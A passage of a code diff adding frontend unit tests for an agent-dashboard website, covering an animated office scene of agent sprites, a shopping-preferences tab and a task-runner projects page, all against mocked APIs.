+    const { overlay, pixel } = mount([agent({ id: 'slot-settler', name: FERDINAND })])
+    const seated = stepUntil(() => hasNameplate(overlay, 0, FERDINAND), 400)
+    expect(seated).toBe(true)
+    // It walked the whole way over: the label now sits on desk 0.
+    expect(textAt(overlay, FERDINAND)!.x).toBeCloseTo((DESKS[0].x + 14) * S)
+    // Arrival ends the entrance, so the doorway stops glowing.
+    fastForward(7)
+    clearRecords()
+    runFrames(1)
+    expect(hasColor(pixel, DOOR_GLOW)).toBe(false)
+  })
+
+  it('seats an already-known agent at once, typing, with its nameplate up', () => {
+    const known = agent({ id: 'slot-returning', name: BERNADETT, running: true })
+    markAgentsKnown('office', [known.id])
+    const { overlay, pixel } = mount([known])
+    fastForward(3)
+    clearRecords()
+    runFrames(1)
+    expect(hasNameplate(overlay, 0, BERNADETT)).toBe(true)
+    expect(labels(overlay)).toContain('active')
+    // Seated at desk 0, so the name label sits over that desk.
+    const name = textAt(overlay, BERNADETT)
+    expect(name).toBeDefined()
+    expect(name!.x).toBeCloseTo((DESKS[0].x + 14) * S)
+    // Typing arms are painted in the agent's own colour beside the body.
+    expect(pixel.fills.some(f => f.w === 1 * S && f.h === 3 * S)).toBe(true)
+  })
+
+  it('caps the office at its eight desks', () => {
+    const many = Array.from({ length: 12 }, (_, i) => agent({ id: `slot-crowd-${i}`, running: true }))
+    const { overlay } = mount(many)
+    expect(labels(overlay)).toContain('8/8 agents')
+    expect(labels(overlay).filter(t => t === 'empty')).toHaveLength(0)
+  })
+
+  it('badges each agent by kind: chat, cron and subagent', () => {
+    const { pixel } = mount([
+      agent({ id: 'slot-badge', name: ROSALINDA }),
+      agent({ id: 'cron-badge', name: FERDINAND, kind: 'cron' }),
+      agent({ id: 'spawn-badge', name: BERNADETT, kind: 'spawn' }),
+    ])
+    // Badges are drawn on the pixel canvas, not the text overlay.
+    expect(labels(pixel)).toEqual(expect.arrayContaining(['💬', '⏰', '🔀']))
+  })
+})
+
+describe('OfficeScene live session updates', () => {
+  it('reuses a seated agent when its session is renamed and stops running', () => {
+    const before = agent({ id: 'slot-rename', name: ROSALINDA, running: true, detail: '3 msgs' })
+    markAgentsKnown('office', [before.id])
+    const { overlay, rerender } = mount([before])
+    clearRecords()
+    runFrames(1)
+    expect(labels(overlay)).toContain('active')
+
+    rerender([agent({ id: 'slot-rename', name: FERDINAND, running: false, detail: '9 msgs' })])
+    clearRecords()
+    runFrames(1)
+    expect(labels(overlay)).toContain(FERDINAND)
+    expect(labels(overlay)).toContain('9 msgs')
+    expect(labels(overlay)).toContain('idle')
+    expect(labels(overlay)).not.toContain('active')
+    // Reused, not re-entered: the desk still shows its nameplate.
+    expect(hasNameplate(overlay, 0, FERDINAND)).toBe(true)
+  })
+
+  it('raises a speech bubble for a new last message, fades it, then drops it', () => {
+    const base = agent({ id: 'slot-talker', name: CONSTANZA, running: true })
+    markAgentsKnown('office', [base.id])
+    const { overlay, rerender } = mount([base])
+
+    rerender([{ ...base, lastMessage: 'Shipping the review lane' }])
+    clearRecords()
+    runFrames(1)
+    expect(labels(overlay).join(' ')).toContain('Shipping')
+
+    // 6.5s in: past the fade threshold, still on screen.
+    nowMs += 6_500
+    clearRecords()
+    runFrames(1)
+    expect(labels(overlay).join(' ')).toContain('Shipping')
+
+    // Past the 7s lifetime the bubble is gone.
+    nowMs += 1_000
+    clearRecords()
+    runFrames(1)
+    expect(labels(overlay).join(' ')).not.toContain('Shipping')
+  })
+
+  it('leaves the bubble down when a rerender repeats the same message', () => {
+    const base = agent({ id: 'slot-repeat', name: ROSALINDA, lastMessage: 'same text' })
+    markAgentsKnown('office', [base.id])
+    const { overlay, rerender } = mount([base])
+    nowMs += 20_000
+    rerender([{ ...base }])
+    clearRecords()
+    runFrames(1)
+    expect(labels(overlay).join(' ')).not.toContain('same text')
+  })
+
+  it('toggles an agent between working and idle when its sprite is clicked', () => {
+    const seated = agent({ id: 'cron-clickable', name: BERNADETT, kind: 'cron', running: true })
+    markAgentsKnown('office', [seated.id])
+    const view = mount([seated])
+    const canvas = view.getByLabelText('Office scene') as HTMLCanvasElement
+
+    clearRecords()
+    runFrames(1)
+    expect(labels(view.overlay)).toContain('active')
+
+    const click = new MouseEvent('click', { bubbles: true })
+    Object.defineProperty(click, 'offsetX', { value: (DESKS[0].x + 10) * S })
+    Object.defineProperty(click, 'offsetY', { value: (DESKS[0].y + 20) * S })
+    act(() => { canvas.dispatchEvent(click) })
+
+    clearRecords()
+    runFrames(1)
+    expect(labels(view.overlay)).toContain('idle')
+    expect(labels(view.overlay)).not.toContain('active')
+  })
+
+  it('ignores a click on empty floor', () => {
+    const seated = agent({ id: 'cron-missed', name: CONSTANZA, kind: 'cron', running: true })
+    markAgentsKnown('office', [seated.id])
+    const view = mount([seated])
+    const canvas = view.getByLabelText('Office scene') as HTMLCanvasElement
+
+    const click = new MouseEvent('click', { bubbles: true })
+    Object.defineProperty(click, 'offsetX', { value: 5 * S })
+    Object.defineProperty(click, 'offsetY', { value: 290 * S })
+    act(() => { canvas.dispatchEvent(click) })
+
+    clearRecords()
+    runFrames(1)
+    expect(labels(view.overlay)).toContain('active')
+  })
+})
+
+describe('OfficeScene daily routine', () => {
+  it('sends an agent for coffee and to the whiteboard, then back to their desks', () => {
+    const { overlay } = mount(seatedCrew('routine'))
+
+    // The coffee break fires at tick 600; the walk is ~500 frames.
+    const atMachine = stepUntil(() => {
+      const name = textAt(overlay, ROSALINDA)
+      return !!name && name.x > 340 * S
+    }, 1400, 25)
+    expect(atMachine).toBe(true)
+
+    // The whiteboard visit fires at tick 900 and parks an agent up by the board.
+    const atBoard = stepUntil(() => {
+      const name = textAt(overlay, FERDINAND)
+      return !!name && name.y < 120 * S
+    }, 900, 25)
+    expect(atBoard).toBe(true)
+
+    // Both breaks are time-boxed, so the walker returns to its own cubicle.
+    const backAtDesk = stepUntil(() => {
+      const name = textAt(overlay, ROSALINDA)
+      return !!name && name.x < (DESKS[0].x + 40) * S
+    }, 1600, 25)
+    expect(backAtDesk).toBe(true)
+  })
+
+  it('pairs two agents up mid-room, prints their chat lines, then breaks the huddle', () => {
+    const { overlay, pixel } = mount(seatedCrew('huddle'))
+
+    // The collaboration roll lands on tick 1800; the pair then walks to the rug
+    // and starts talking 60 frames after the second one arrives.
+    const talking = stepUntil(
+      () => labels(overlay).includes('New audiobook?'),
+      2600, 25,
+    )
+    expect(talking).toBe(true)
+    // The reply of the pair and the dashed link between them come with it.
+    expect(labels(overlay)).toContain('Adding to lib!')
+    expect(pixel.dashes.count).toBeGreaterThan(0)
+    expect(hasColor(pixel, COLLAB_MARK)).toBe(true)
+
+    // The huddle is capped at 600 frames, after which the chat clears.
+    const dispersed = stepUntil(
+      () => !labels(overlay).includes('New audiobook?'),
+      900, 25,
+    )
+    expect(dispersed).toBe(true)
+  })
+})

--- a/website/src/test/PreferencesTabCoverage.test.tsx
+++ b/website/src/test/PreferencesTabCoverage.test.tsx
@@ -1,0 +1,351 @@
+import { describe, it, expect, vi, beforeEach } from 'vitest'
+import { screen, waitFor, fireEvent, within } from '@testing-library/react'
+import { PreferencesTab } from '../apps/personal-shopper/PreferencesTab'
+import { renderWithProviders } from './helpers'
+import * as shopApi from '../apps/personal-shopper/api'
+
+vi.mock('../apps/personal-shopper/api', () => ({
+  get: vi.fn(),
+  post: vi.fn(),
+  put: vi.fn(),
+  del: vi.fn(),
+}))
+
+interface Pref {
+  id: string
+  text: string
+  tags: string[]
+  created_at: string
+  updated_at: string
+}
+
+interface Grp {
+  id: string
+  name: string
+  icon: string
+  sort_order: number
+}
+
+const STAMP = '2026-08-10T12:00:00+00:00'
+
+const mkPref = (id: string, text: string, tags: string[] = []): Pref => ({
+  id,
+  text,
+  tags,
+  created_at: STAMP,
+  updated_at: STAMP,
+})
+
+const mkGroup = (id: string, name: string, sort_order = 0): Grp => ({ id, name, icon: '', sort_order })
+
+const mockGet = vi.mocked(shopApi.get)
+const mockPost = vi.mocked(shopApi.post)
+const mockPut = vi.mocked(shopApi.put)
+const mockDel = vi.mocked(shopApi.del)
+
+/** Answer both queries the tab fires, so neither resolves undefined. */
+function seed({ preferences = [] as Pref[], groups = [] as Grp[] } = {}) {
+  mockGet.mockImplementation((path: string) => {
+    if (path === '/groups') return Promise.resolve({ groups })
+    return Promise.resolve({ preferences })
+  })
+  mockPost.mockResolvedValue({ id: 'new-id' })
+  mockPut.mockResolvedValue(undefined)
+  mockDel.mockResolvedValue(undefined)
+}
+
+const PREF_PLACEHOLDER = 'Add a preference (e.g. "shoe size US 10")'
+
+const prefInput = () => screen.getByPlaceholderText(PREF_PLACEHOLDER)
+
+/** The nearest enclosing form of `el` — submitted directly so the guard branch
+ *  behind a disabled submit button is still reachable. */
+function formOf(el: HTMLElement): HTMLFormElement {
+  const form = el.closest('form')
+  if (!form) throw new Error('element is not inside a form')
+  return form
+}
+
+/** A group's <section>, located through its heading so same-named preference
+ *  text in a sibling section cannot be confused for it. */
+function sectionFor(groupName: string): HTMLElement {
+  const section = screen.getByRole('heading', { name: groupName }).closest('section')
+  if (!section) throw new Error(`no section for group ${groupName}`)
+  return section as HTMLElement
+}
+
+const editBtn = (text: string) => screen.getByRole('button', { name: `Edit preference \u201c${text}\u201d` })
+const deletePrefBtn = (text: string) =>
+  screen.getByRole('button', { name: `Delete preference \u201c${text}\u201d` })
+
+beforeEach(() => {
+  vi.clearAllMocks()
+})
+
+// ── Query states ───────────────────────────────────────────────────────────
+
+describe('PreferencesTab — query states', () => {
+  it('shows the loading placeholder while the preferences query is in flight', async () => {
+    mockGet.mockImplementation((path: string) => {
+      if (path === '/groups') return Promise.resolve({ groups: [] })
+      return new Promise<never>(() => {})
+    })
+    renderWithProviders(<PreferencesTab />)
+    expect(await screen.findByText('Loading preferences...')).toBeInTheDocument()
+    // The whole editing surface is replaced while loading.
+    expect(screen.queryByPlaceholderText(PREF_PLACEHOLDER)).toBeNull()
+  })
+
+  it('shows the empty state and hides the group picker when nothing exists yet', async () => {
+    seed()
+    renderWithProviders(<PreferencesTab />)
+    expect(await screen.findByText('No preferences yet')).toBeInTheDocument()
+    expect(screen.getByText('Add one above, or import them later.')).toBeInTheDocument()
+    // No groups -> no "assign to group" dropdown next to the add field.
+    expect(screen.queryByRole('combobox', { name: 'Assign to group' })).toBeNull()
+    expect(screen.queryByText('Ungrouped')).toBeNull()
+    expect(screen.getByRole('button', { name: 'Add group' })).toBeInTheDocument()
+  })
+
+  it('lists tagless preferences under Ungrouped', async () => {
+    seed({ preferences: [mkPref('p1', 'shoe size US 10')] })
+    renderWithProviders(<PreferencesTab />)
+    expect(await screen.findByText('Ungrouped')).toBeInTheDocument()
+    const section = screen.getByText('Ungrouped').closest('section') as HTMLElement
+    expect(within(section).getByText('shoe size US 10')).toBeInTheDocument()
+    expect(screen.queryByText('No preferences yet')).toBeNull()
+  })
+})
+
+// ── Group sections ─────────────────────────────────────────────────────────
+
+describe('PreferencesTab — group sections', () => {
+  it('files a preference under its group and marks an unfilled group as empty', async () => {
+    seed({
+      preferences: [mkPref('p1', 'wide toe box', ['g1'])],
+      groups: [mkGroup('g1', 'Footwear'), mkGroup('g2', 'Colours', 1)],
+    })
+    renderWithProviders(<PreferencesTab />)
+    const footwear = await waitFor(() => sectionFor('Footwear'))
+    expect(within(footwear).getByText('wide toe box')).toBeInTheDocument()
+    // Its own group pill would only restate the heading above it.
+    expect(within(footwear).queryByText('Footwear')).toBe(
+      within(footwear).getByRole('heading', { name: 'Footwear' }),
+    )
+    expect(within(sectionFor('Colours')).getByText('No items in this group')).toBeInTheDocument()
+  })
+
+  it('renders a pill for every other tag, falling back to the raw id when unknown', async () => {
+    seed({
+      preferences: [mkPref('p1', 'wide toe box', ['g1', 'legacy-default-tag'])],
+      groups: [mkGroup('g1', 'Footwear')],
+    })
+    renderWithProviders(<PreferencesTab />)
+    const footwear = await waitFor(() => sectionFor('Footwear'))
+    expect(within(footwear).getByText('legacy-default-tag')).toBeInTheDocument()
+  })
+
+  it('names known groups in the pill of a preference shown in another group', async () => {
+    seed({
+      preferences: [mkPref('p1', 'wide toe box', ['g1', 'g2'])],
+      groups: [mkGroup('g1', 'Footwear'), mkGroup('g2', 'Colours', 1)],
+    })
+    renderWithProviders(<PreferencesTab />)
+    const footwear = await waitFor(() => sectionFor('Footwear'))
+    // Same preference is listed in both sections; each shows the OTHER group's name.
+    expect(within(footwear).getByText('Colours')).toBeInTheDocument()
+    expect(within(sectionFor('Colours')).getByText('Footwear')).toBeInTheDocument()
+  })
+
+  it('collects every preference sharing a tag into that one group', async () => {
+    seed({
+      preferences: [mkPref('p1', 'wide toe box', ['g1']), mkPref('p2', 'no wool lining', ['g1'])],
+      groups: [mkGroup('g1', 'Footwear')],
+    })
+    renderWithProviders(<PreferencesTab />)
+    const footwear = await waitFor(() => sectionFor('Footwear'))
+    expect(within(footwear).getByText('wide toe box')).toBeInTheDocument()
+    expect(within(footwear).getByText('no wool lining')).toBeInTheDocument()
+    expect(within(footwear).queryByText('No items in this group')).toBeNull()
+  })
+
+  it('deletes a preference from inside a group section', async () => {
+    seed({ preferences: [mkPref('p1', 'wide toe box', ['g1'])], groups: [mkGroup('g1', 'Footwear')] })
+    renderWithProviders(<PreferencesTab />)
+    const footwear = await waitFor(() => sectionFor('Footwear'))
+    fireEvent.click(
+      within(footwear).getByRole('button', { name: 'Delete preference \u201cwide toe box\u201d' }),
+    )
+    await waitFor(() => expect(mockDel).toHaveBeenCalledWith('/preferences/p1'))
+  })
+
+  it('deletes a group by id without touching its preferences', async () => {
+    seed({ preferences: [mkPref('p1', 'wide toe box', ['g1'])], groups: [mkGroup('g1', 'Footwear')] })
+    renderWithProviders(<PreferencesTab />)
+    fireEvent.click(await screen.findByRole('button', { name: 'Delete group Footwear' }))
+    await waitFor(() => expect(mockDel).toHaveBeenCalledWith('/groups/g1'))
+    expect(mockDel).not.toHaveBeenCalledWith('/preferences/p1')
+  })
+})
+
+// ── Adding preferences ─────────────────────────────────────────────────────
+
+describe('PreferencesTab — adding a preference', () => {
+  it('posts trimmed text with no tags and clears the field on success', async () => {
+    seed()
+    renderWithProviders(<PreferencesTab />)
+    const input = await screen.findByPlaceholderText(PREF_PLACEHOLDER)
+    fireEvent.change(input, { target: { value: '  ships to Canada  ' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Add' }))
+    await waitFor(() =>
+      expect(mockPost).toHaveBeenCalledWith('/preferences', { text: 'ships to Canada', tags: [] }),
+    )
+    await waitFor(() => expect(prefInput()).toHaveValue(''))
+  })
+
+  it('keeps the submit button disabled until the field has non-blank text', async () => {
+    seed()
+    renderWithProviders(<PreferencesTab />)
+    const input = await screen.findByPlaceholderText(PREF_PLACEHOLDER)
+    expect(screen.getByRole('button', { name: 'Add' })).toBeDisabled()
+    fireEvent.change(input, { target: { value: '   ' } })
+    expect(screen.getByRole('button', { name: 'Add' })).toBeDisabled()
+    fireEvent.change(input, { target: { value: 'no wool' } })
+    expect(screen.getByRole('button', { name: 'Add' })).toBeEnabled()
+  })
+
+  it('posts nothing when the form is submitted with a blank field', async () => {
+    seed()
+    renderWithProviders(<PreferencesTab />)
+    const input = await screen.findByPlaceholderText(PREF_PLACEHOLDER)
+    fireEvent.submit(formOf(input))
+    await waitFor(() => expect(mockGet).toHaveBeenCalled())
+    expect(mockPost).not.toHaveBeenCalled()
+  })
+
+  it('sends the chosen group as the preference tag so the group is fillable', async () => {
+    seed({ groups: [mkGroup('g1', 'Footwear')] })
+    renderWithProviders(<PreferencesTab />)
+    const trigger = await screen.findByRole('combobox', { name: 'Assign to group' })
+    fireEvent.click(trigger)
+    fireEvent.click(await screen.findByRole('option', { name: 'Footwear' }))
+    fireEvent.change(prefInput(), { target: { value: 'wide toe box' } })
+    fireEvent.submit(formOf(prefInput()))
+    await waitFor(() =>
+      expect(mockPost).toHaveBeenCalledWith('/preferences', { text: 'wide toe box', tags: ['g1'] }),
+    )
+  })
+
+  it('offers a no-group row that clears the assignment back to untagged', async () => {
+    seed({ groups: [mkGroup('g1', 'Footwear')] })
+    renderWithProviders(<PreferencesTab />)
+    const trigger = await screen.findByRole('combobox', { name: 'Assign to group' })
+    fireEvent.click(trigger)
+    fireEvent.click(await screen.findByRole('option', { name: 'Footwear' }))
+    fireEvent.click(trigger)
+    fireEvent.click(await screen.findByRole('option', { name: 'No group' }))
+    fireEvent.change(prefInput(), { target: { value: 'no wool' } })
+    fireEvent.submit(formOf(prefInput()))
+    await waitFor(() =>
+      expect(mockPost).toHaveBeenCalledWith('/preferences', { text: 'no wool', tags: [] }),
+    )
+  })
+})
+
+// ── Editing and deleting a row ─────────────────────────────────────────────
+
+describe('PreferencesTab — preference row', () => {
+  it('saves an edited row through PUT and leaves edit mode', async () => {
+    seed({ preferences: [mkPref('p1', 'shoe size US 10')] })
+    renderWithProviders(<PreferencesTab />)
+    fireEvent.click(await waitFor(() => editBtn('shoe size US 10')))
+    const editField = screen.getByDisplayValue('shoe size US 10')
+    fireEvent.change(editField, { target: { value: ' shoe size US 11 ' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Save' }))
+    await waitFor(() => expect(mockPut).toHaveBeenCalledWith('/preferences/p1', { text: 'shoe size US 11' }))
+    await waitFor(() => expect(screen.queryByRole('button', { name: 'Save' })).toBeNull())
+  })
+
+  it('leaves edit mode without a PUT when the text was not changed', async () => {
+    seed({ preferences: [mkPref('p1', 'shoe size US 10')] })
+    renderWithProviders(<PreferencesTab />)
+    fireEvent.click(await waitFor(() => editBtn('shoe size US 10')))
+    fireEvent.submit(formOf(screen.getByDisplayValue('shoe size US 10')))
+    await waitFor(() => expect(screen.queryByRole('button', { name: 'Save' })).toBeNull())
+    expect(mockPut).not.toHaveBeenCalled()
+  })
+
+  it('discards the edit on Escape', async () => {
+    seed({ preferences: [mkPref('p1', 'shoe size US 10')] })
+    renderWithProviders(<PreferencesTab />)
+    fireEvent.click(await waitFor(() => editBtn('shoe size US 10')))
+    const editField = screen.getByDisplayValue('shoe size US 10')
+    fireEvent.change(editField, { target: { value: 'typed then abandoned' } })
+    fireEvent.keyDown(editField, { key: 'Escape' })
+    await waitFor(() => expect(screen.queryByRole('button', { name: 'Save' })).toBeNull())
+    expect(mockPut).not.toHaveBeenCalled()
+    expect(screen.getByText('shoe size US 10')).toBeInTheDocument()
+  })
+
+  it('discards the edit through the cancel control', async () => {
+    seed({ preferences: [mkPref('p1', 'shoe size US 10')] })
+    renderWithProviders(<PreferencesTab />)
+    fireEvent.click(await waitFor(() => editBtn('shoe size US 10')))
+    fireEvent.click(screen.getByRole('button', { name: 'Cancel' }))
+    await waitFor(() => expect(screen.queryByRole('button', { name: 'Save' })).toBeNull())
+    expect(mockPut).not.toHaveBeenCalled()
+  })
+
+  it('stays in edit mode for keys other than Escape', async () => {
+    seed({ preferences: [mkPref('p1', 'shoe size US 10')] })
+    renderWithProviders(<PreferencesTab />)
+    fireEvent.click(await waitFor(() => editBtn('shoe size US 10')))
+    const editField = screen.getByDisplayValue('shoe size US 10')
+    fireEvent.keyDown(editField, { key: 'a' })
+    fireEvent.keyDown(editField, { key: 'Tab' })
+    expect(screen.getByRole('button', { name: 'Save' })).toBeInTheDocument()
+  })
+
+  it('deletes a row by id', async () => {
+    seed({ preferences: [mkPref('p1', 'shoe size US 10')] })
+    renderWithProviders(<PreferencesTab />)
+    fireEvent.click(await waitFor(() => deletePrefBtn('shoe size US 10')))
+    await waitFor(() => expect(mockDel).toHaveBeenCalledWith('/preferences/p1'))
+  })
+})
+
+// ── Creating a group ───────────────────────────────────────────────────────
+
+describe('PreferencesTab — creating a group', () => {
+  it('creates a group with a blank icon and closes the form on success', async () => {
+    seed()
+    renderWithProviders(<PreferencesTab />)
+    fireEvent.click(await screen.findByRole('button', { name: 'Add group' }))
+    const nameField = screen.getByPlaceholderText('Group name')
+    fireEvent.change(nameField, { target: { value: '  Footwear  ' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Create' }))
+    await waitFor(() => expect(mockPost).toHaveBeenCalledWith('/groups', { name: 'Footwear', icon: '' }))
+    await waitFor(() => expect(screen.queryByPlaceholderText('Group name')).toBeNull())
+    expect(screen.getByRole('button', { name: 'Add group' })).toBeInTheDocument()
+  })
+
+  it('closes the group form on cancel without posting', async () => {
+    seed()
+    renderWithProviders(<PreferencesTab />)
+    fireEvent.click(await screen.findByRole('button', { name: 'Add group' }))
+    fireEvent.click(screen.getByRole('button', { name: 'Cancel' }))
+    await waitFor(() => expect(screen.queryByPlaceholderText('Group name')).toBeNull())
+    expect(mockPost).not.toHaveBeenCalled()
+  })
+
+  it('posts nothing when the group form is submitted blank', async () => {
+    seed()
+    renderWithProviders(<PreferencesTab />)
+    fireEvent.click(await screen.findByRole('button', { name: 'Add group' }))
+    const nameField = screen.getByPlaceholderText('Group name')
+    expect(screen.getByRole('button', { name: 'Create' })).toBeDisabled()
+    fireEvent.submit(formOf(nameField))
+    await waitFor(() => expect(screen.getByPlaceholderText('Group name')).toBeInTheDocument())
+    expect(mockPost).not.toHaveBeenCalled()
+  })
+})

--- a/website/src/test/ProjectsPageCoverage.test.tsx
+++ b/website/src/test/ProjectsPageCoverage.test.tsx
@@ -1,0 +1,614 @@
+// Task Runner page — the paths the two existing ProjectsPage suites leave cold:
+// spec/YAML file uploads, the refine round trip, the sessionStorage planning
+// recovery poll, the ?applied / ?autoRun deep link, and every per-status button
+// in the selected-run header (planned / planning / running / paused / completed).
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { screen, fireEvent, waitFor, within, act } from '@testing-library/react'
+import { renderWithProviders } from './helpers'
+import ProjectsPage from '../pages/ProjectsPage'
+import { api } from '../api/client'
+import type { ProjectRun, RunStatus } from '../types'
+
+// The detail pane is exercised by its own suite; here it only has to prove the
+// two callbacks ProjectsPage hands it are wired to the run under selection.
+vi.mock('../pages/ProjectDetailPage', () => ({
+  default: ({ onRetry, onRefresh }: { onRetry: (idx: number) => Promise<void>; onRefresh: () => void }) => (
+    <div data-testid="project-detail">
+      <button onClick={() => { void onRetry(3) }}>detail retry step</button>
+      <button onClick={() => { onRefresh() }}>detail refresh</button>
+    </div>
+  ),
+}))
+
+vi.mock('../components/AgentSelector', () => ({
+  default: ({ value, onChange }: { value: string; onChange: (name: string) => void }) => (
+    <select
+      aria-label="Agent picker"
+      value={value}
+      onChange={(e: React.ChangeEvent<HTMLSelectElement>) => onChange(e.target.value)}
+    >
+      <option value="">default</option>
+      <option value="reviewer">reviewer</option>
+    </select>
+  ),
+}))
+
+vi.mock('../api/client', () => ({
+  api: {
+    taskRunnerStatus: vi.fn(),
+    kirocrewAgents: vi.fn(),
+    planTask: vi.fn(),
+    cancelPlan: vi.fn(),
+    executePlan: vi.fn(),
+    planContext: vi.fn(),
+    deleteTaskRun: vi.fn(),
+    cancelTaskRunner: vi.fn(),
+    retryTaskRun: vi.fn(),
+    renameTaskRun: vi.fn(),
+    pauseTaskRun: vi.fn(),
+    taskRunToChat: vi.fn(),
+    refineStatus: vi.fn(),
+    refineTaskInput: vi.fn(),
+    refineCancel: vi.fn(),
+    createCron: vi.fn(),
+  },
+}))
+
+const mkRun = (overrides: Partial<ProjectRun> = {}): ProjectRun => ({
+  task_id: 'run-1', name: 'Existing', running: false, status: 'completed' as RunStatus,
+  steps: 2, completed: 1, failed: 0, skipped: 0, current_step: 1,
+  spec: '', spec_name: '', error: '', tokens_used: 0, replan_count: 0,
+  task_details: [], started_at: 0, finished_at: 0,
+  work_dir: '', branch_name: '', spec_content: 'spec body', lessons_learned: [],
+  commits: 0, original_input: '', source: 'text', groups: [],
+  ...overrides,
+})
+
+/** Every request the page can make, resolved with a benign default. Set
+ *  unconditionally so no test inherits a previous test's mockResolvedValue. */
+function resetApi(runs: ProjectRun[] = []) {
+  vi.mocked(api.taskRunnerStatus).mockResolvedValue({ running: false, available: true, runs })
+  vi.mocked(api.kirocrewAgents).mockResolvedValue({ agents: [], default_agent: '' })
+  vi.mocked(api.refineStatus).mockResolvedValue({ status: 'idle', text: '', error: '' })
+  vi.mocked(api.planTask).mockResolvedValue({ ok: true, task_id: 'plan-1' })
+  vi.mocked(api.cancelPlan).mockResolvedValue({ ok: true })
+  vi.mocked(api.executePlan).mockResolvedValue({ ok: true })
+  vi.mocked(api.planContext).mockResolvedValue({ ok: true, context: 'PLAN CONTEXT' })
+  vi.mocked(api.deleteTaskRun).mockResolvedValue({ ok: true })
+  vi.mocked(api.cancelTaskRunner).mockResolvedValue({ ok: true })
+  vi.mocked(api.retryTaskRun).mockResolvedValue({ ok: true })
+  vi.mocked(api.renameTaskRun).mockResolvedValue({ ok: true })
+  vi.mocked(api.pauseTaskRun).mockResolvedValue({ ok: true })
+  vi.mocked(api.taskRunToChat).mockResolvedValue({ slot: 2 })
+  vi.mocked(api.refineTaskInput).mockResolvedValue({ ok: true })
+  vi.mocked(api.refineCancel).mockResolvedValue({ ok: true })
+  vi.mocked(api.createCron).mockResolvedValue({ ok: true })
+}
+
+
+/** Select a run from the rail and return the header action row it opens. */
+async function openRun(name = 'Existing'): Promise<HTMLElement> {
+  fireEvent.click(await screen.findByRole('button', { name: `Open project ${name}` }))
+  await screen.findByTestId('project-detail')
+  return screen.getByTestId('project-detail').parentElement!.parentElement!
+    .querySelector<HTMLElement>('div.border-b')!
+}
+
+let alertSpy: ReturnType<typeof vi.spyOn>
+
+beforeEach(() => {
+  vi.clearAllMocks()
+  sessionStorage.clear()
+  localStorage.clear()
+  resetApi()
+  alertSpy = vi.spyOn(window, 'alert').mockImplementation(() => {})
+})
+
+afterEach(() => {
+  vi.useRealTimers()
+  alertSpy.mockRestore()
+})
+
+describe('ProjectsPage — mode tabs', () => {
+  it('switches to the YAML panel and back to Compose, persisting the choice', async () => {
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.click(screen.getByRole('button', { name: 'From YAML' }))
+    expect(screen.getByPlaceholderText('Paste YAML workflow or upload a .yaml file...')).toBeInTheDocument()
+    expect(screen.getByText(/YAML workflows bypass the LLM decomposer/)).toBeInTheDocument()
+    await waitFor(() => expect(sessionStorage.getItem('tr-mode')).toBe('yaml'))
+
+    fireEvent.click(screen.getByRole('button', { name: 'Compose' }))
+    expect(screen.getByPlaceholderText('Describe your task...')).toBeInTheDocument()
+    await waitFor(() => expect(sessionStorage.getItem('tr-mode')).toBe('compose'))
+  })
+
+  it('keeps typed spec text in sessionStorage', async () => {
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.click(screen.getByRole('button', { name: 'From Spec' }))
+    const ta = screen.getByPlaceholderText('Paste spec content or upload a file...')
+    fireEvent.change(ta, { target: { value: 'step one' } })
+    expect((ta as HTMLTextAreaElement).value).toBe('step one')
+    await waitFor(() => expect(sessionStorage.getItem('tr-spec')).toBe('step one'))
+  })
+})
+
+describe('ProjectsPage — spec and YAML uploads', () => {
+  it('reads a picked spec file into the spec textarea and clears the picker', async () => {
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.click(screen.getByRole('button', { name: 'From Spec' }))
+    const picker = screen.getByLabelText('Upload a file') as HTMLInputElement
+    fireEvent.change(picker, { target: { files: [new File(['# plan body'], 'plan.md', { type: 'text/markdown' })] } })
+    const ta = screen.getByPlaceholderText('Paste spec content or upload a file...') as HTMLTextAreaElement
+    await waitFor(() => expect(ta.value).toBe('# plan body'))
+    expect(picker.value).toBe('')
+    expect(alertSpy).not.toHaveBeenCalled()
+  })
+
+  it('refuses a YAML file on the spec tab and leaves the spec text untouched', async () => {
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.click(screen.getByRole('button', { name: 'From Spec' }))
+    const picker = screen.getByLabelText('Upload a file') as HTMLInputElement
+    fireEvent.change(picker, { target: { files: [new File(['a: 1'], 'flow.yaml', { type: 'text/yaml' })] } })
+    expect(alertSpy).toHaveBeenCalledWith('YAML files should be uploaded via the "From YAML" tab.')
+    const ta = screen.getByPlaceholderText('Paste spec content or upload a file...') as HTMLTextAreaElement
+    await waitFor(() => expect(ta.value).toBe(''))
+  })
+
+  it('reads a picked .yml file into the YAML textarea', async () => {
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.click(screen.getByRole('button', { name: 'From YAML' }))
+    const picker = screen.getByLabelText('Upload a file') as HTMLInputElement
+    fireEvent.change(picker, { target: { files: [new File(['steps: []'], 'flow.yml', { type: 'text/yaml' })] } })
+    const ta = screen.getByPlaceholderText('Paste YAML workflow or upload a .yaml file...') as HTMLTextAreaElement
+    await waitFor(() => expect(ta.value).toBe('steps: []'))
+    expect(picker.value).toBe('')
+  })
+
+  it('refuses a non-YAML file on the YAML tab', () => {
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.click(screen.getByRole('button', { name: 'From YAML' }))
+    const picker = screen.getByLabelText('Upload a file') as HTMLInputElement
+    fireEvent.change(picker, { target: { files: [new File(['hi'], 'notes.md', { type: 'text/markdown' })] } })
+    expect(alertSpy).toHaveBeenCalledWith('Only .yaml/.yml files are accepted here. Use the "From Spec" tab for other formats.')
+  })
+
+  it('ignores a picker change that carries no file', () => {
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.click(screen.getByRole('button', { name: 'From Spec' }))
+    fireEvent.change(screen.getByLabelText('Upload a file'), { target: { files: [] } })
+    expect(alertSpy).not.toHaveBeenCalled()
+  })
+})
+
+describe('ProjectsPage — refine round trip', () => {
+  it('does not start a refine with an empty prompt', () => {
+    renderWithProviders(<ProjectsPage />)
+    expect(screen.getByRole('button', { name: 'Refine into Spec' })).toBeDisabled()
+    expect(api.refineTaskInput).not.toHaveBeenCalled()
+  })
+
+  it('renders a returned refined spec and plans from it', async () => {
+    vi.mocked(api.refineStatus).mockResolvedValue({ status: 'idle', text: 'REFINED SPEC', error: '' })
